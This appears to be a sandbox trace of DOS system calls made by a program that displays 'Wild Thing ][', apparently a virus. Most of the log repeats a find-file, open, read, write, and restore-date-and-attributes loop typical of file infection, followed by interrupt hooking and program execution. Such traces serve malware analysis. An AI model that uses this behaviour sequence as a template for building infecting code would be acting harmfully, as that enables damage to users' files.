2018-12-25T12:42:11.096137244Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.099937581Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.110082271Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.11225474Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.122082283Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.135051321Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.138520449Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.145565685Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.158166016Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.16620238Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.168402709Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.1764969Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.178469578Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.181873003Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.18500144Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.194302161Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.19603269Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.205422622Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.21669606Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.219995432Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.227993348Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.239032306Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.246822162Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.24967646Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.257362879Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.258972617Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.261951776Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.264499525Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.273478102Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.274880465Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.287858396Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.299609898Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.302829555Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.309618649Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.320378205Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.327685663Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.330028493Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.337207184Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.338571051Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.342128098Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.344109946Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.353624171Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.356167817Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.364653101Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.375882435Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.379401437Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.385779553Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.396649035Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.409533095Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.411452802Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.418981729Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.420248772Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.426895958Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.428963828Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.439252423Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.442272673Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.451236211Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.462671271Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.467096948Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.473873626Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.485577339Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.494228919Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.496560676Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.504048494Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.505815067Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:11.50992092Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:11.5121567Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:11.521581548Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.524201961Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.532807291Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.543775286Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.547628805Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:11.554941303Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:11.566047502Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:11.574419957Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:11.576143041Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:11.582392322Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:11.584662327Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:11.592732249Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:11.603670011Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:11.606676596Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:11.611783452Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:11.614935862Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:11.616468177Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:13.821229975Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:13.823447428Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:13.826244465Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:13.830152877Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:13.842299958Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:13.844123815Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:13.847243295Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:13.865315134Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:13.866732434Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:13.872053542Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:13.875570965Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:13.878341835Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:13.885724649Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:13.88919594Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.891862814Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:13.895642751Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:13.904890587Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:13.906198195Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:13.908427386Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:13.924626827Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:13.929706748Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:13.932226694Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.933472684Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:13.934368374Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.935843968Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:13.937142539Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:13.942561701Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:13.945209611Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:13.947414883Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.948631568Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.950714026Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.952534541Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.953734094Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.954948003Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.956876943Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.960367682Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.962688132Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.968495604Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.978061527Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.979890176Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.983191241Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.985162235Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.987366281Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.989936708Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.991648574Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.993489026Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.99641754Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:13.998465366Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.000572606Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.003777666Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.005567605Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.012282561Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.026297625Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.028504338Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.030632566Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.034716176Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.0368377Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:14.038933662Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:14.045932764Z 62 PC: 8f90e | Close file
2018-12-25T12:42:14.048251056Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:14.05086946Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:14.053494795Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:14.059471175Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:14.061425584Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:14.067020362Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:14.069314695Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:14.070981856Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:14.072878169Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:14.074639309Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:14.076473314Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:14.078799112Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:14.082386084Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:14.084546876Z 73 PC: 8efea | Release memory
2018-12-25T12:42:14.086561461Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:14.091158484Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:14.093477854Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:14.095544859Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:14.098457441Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:14.10948702Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:14.116854263Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:14.119749343Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:14.12250696Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:14.146559068Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:14.148473698Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:14.15034264Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:14.153516423Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:14.155740871Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:14.157225572Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:14.159049579Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:14.161042435Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:14.163018666Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:14.165668392Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:14.171503952Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:14.178866327Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:14.184695168Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:14.186143754Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:14.18908905Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:14.190718935Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:14.193531602Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:14.196081265Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:14.198008991Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:14.199996301Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:14.202245594Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:14.205128245Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:14.207498031Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:14.214773692Z 62 PC: 131ba | Close file
2018-12-25T12:42:14.217288056Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:14.21881612Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:14.221348368Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:14.223462057Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:14.225226514Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:14.228337139Z 73 PC: 119df | Release memory
2018-12-25T12:42:14.230386469Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:14.232866219Z 72 PC: 119fd | Allocate memory